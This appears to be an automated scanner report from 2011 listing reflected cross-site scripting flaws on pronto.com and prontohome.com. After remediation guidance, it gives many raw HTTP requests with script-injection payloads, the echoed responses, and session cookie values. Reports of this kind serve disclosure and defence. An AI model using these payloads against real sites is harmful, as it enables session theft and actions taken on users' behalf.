Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pronto.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 53b14'><script>alert(1)</script>14cef914137 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?53b14'><script>alert(1)</script>14cef914137=1 HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af9b4'><script>alert(1)</script>b5b3c399f43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /discount-barbecue-grills-v1_4_50_270-csaf9b4'><script>alert(1)</script>b5b3c399f43 HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:35:53 GMT Server: Apache/2.2.4 (Fedora) _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 97537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://ww ...[SNIP]... <meta content='http://www.pronto.com/discount-barbecue-grills-v1_4_50_270-csaf9b4'><script>alert(1)</script>b5b3c399f43' property='og:url'/> ...[SNIP]...
1.3. http://www.prontohome.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45532'><script>alert(1)</script>a3a288da779 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?45532'><script>alert(1)</script>a3a288da779=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//E ...[SNIP]... <meta content='http://www.prontohome.com/?45532'><script>alert(1)</script>a3a288da779=1' property='og:url'/> ...[SNIP]...
1.4. http://www.prontohome.com/bath [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/bath
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 52a1f'><script>alert(1)</script>922f84add1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bath?52a1f'><script>alert(1)</script>922f84add1d=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99eb6'><script>alert(1)</script>7b8e86121a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bathroom-furniture99eb6'><script>alert(1)</script>7b8e86121a6 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:36:51 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/bathroom-furniture99eb6'><script>alert(1)</script>7b8e86121a6' property='og:url'/> ...[SNIP]...
1.6. http://www.prontohome.com/bathroom-furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/bathroom-furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74bdd'><script>alert(1)</script>8412e6b9e17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bathroom-furniture?74bdd'><script>alert(1)</script>8412e6b9e17=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fde5c'><script>alert(1)</script>28928adb786 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bedfde5c'><script>alert(1)</script>28928adb786 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:38:09 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29074
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/bedfde5c'><script>alert(1)</script>28928adb786' property='og:url'/> ...[SNIP]...
1.8. http://www.prontohome.com/bed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/bed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78fdc'><script>alert(1)</script>4285c075c76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bed?78fdc'><script>alert(1)</script>4285c075c76=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b65e3'><script>alert(1)</script>0df371179d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bedroom-and-bathroom-furnitureb65e3'><script>alert(1)</script>0df371179d8 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:37:38 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29128
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/bedroom-and-bathroom-furnitureb65e3'><script>alert(1)</script>0df371179d8' property='og:url'/> ...[SNIP]...
1.10. http://www.prontohome.com/bedroom-and-bathroom-furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/bedroom-and-bathroom-furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9934'><script>alert(1)</script>b212f1b4b47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bedroom-and-bathroom-furniture?c9934'><script>alert(1)</script>b212f1b4b47=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http ...[SNIP]... <meta content='http://www.prontohome.com/bedroom-and-bathroom-furniture?c9934'><script>alert(1)</script>b212f1b4b47=1' property='og:url'/> ...[SNIP]...
1.11. http://www.prontohome.com/blankets-and-throws [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/blankets-and-throws
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 22836'><script>alert(1)</script>bda96bf2e06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blankets-and-throws?22836'><script>alert(1)</script>bda96bf2e06=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
1.12. http://www.prontohome.com/coverlets-and-quilts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/coverlets-and-quilts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 569eb'><script>alert(1)</script>fdd86bedabe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coverlets-and-quilts?569eb'><script>alert(1)</script>fdd86bedabe=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 409fa'><script>alert(1)</script>2d96f0e4921 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dining409fa'><script>alert(1)</script>2d96f0e4921 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:43:24 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/dining409fa'><script>alert(1)</script>2d96f0e4921' property='og:url'/> ...[SNIP]...
1.14. http://www.prontohome.com/dining [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/dining
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d540c'><script>alert(1)</script>3257dfa6396 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dining?d540c'><script>alert(1)</script>3257dfa6396=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8a63f'><script>alert(1)</script>db5385858ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dining-and-kitchen-furniture8a63f'><script>alert(1)</script>db5385858ed HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:37:00 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29124
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/dining-and-kitchen-furniture8a63f'><script>alert(1)</script>db5385858ed' property='og:url'/> ...[SNIP]...
1.16. http://www.prontohome.com/dining-and-kitchen-furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/dining-and-kitchen-furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c381'><script>alert(1)</script>b840ab17f38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dining-and-kitchen-furniture?9c381'><script>alert(1)</script>b840ab17f38=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http ...[SNIP]... <meta content='http://www.prontohome.com/dining-and-kitchen-furniture?9c381'><script>alert(1)</script>b840ab17f38=1' property='og:url'/> ...[SNIP]...
1.17. http://www.prontohome.com/duvets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/duvets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2f54'><script>alert(1)</script>7c1e3e5d61f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /duvets?d2f54'><script>alert(1)</script>7c1e3e5d61f=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9f62'><script>alert(1)</script>4266d2e6889 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b77f4'><script>alert(1)</script>513cb6332a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /furnitureb77f4'><script>alert(1)</script>513cb6332a6 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:36:52 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/furnitureb77f4'><script>alert(1)</script>513cb6332a6' property='og:url'/> ...[SNIP]...
1.20. http://www.prontohome.com/furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af1f5'><script>alert(1)</script>c548cb5e2ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /furniture?af1f5'><script>alert(1)</script>c548cb5e2ba=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5d4a'><script>alert(1)</script>6c5f8457063 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home-office-furniturea5d4a'><script>alert(1)</script>6c5f8457063 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:38:03 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/home-office-furniturea5d4a'><script>alert(1)</script>6c5f8457063' property='og:url'/> ...[SNIP]...
1.22. http://www.prontohome.com/home-office-furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/home-office-furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 545c9'><script>alert(1)</script>09f7f268f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
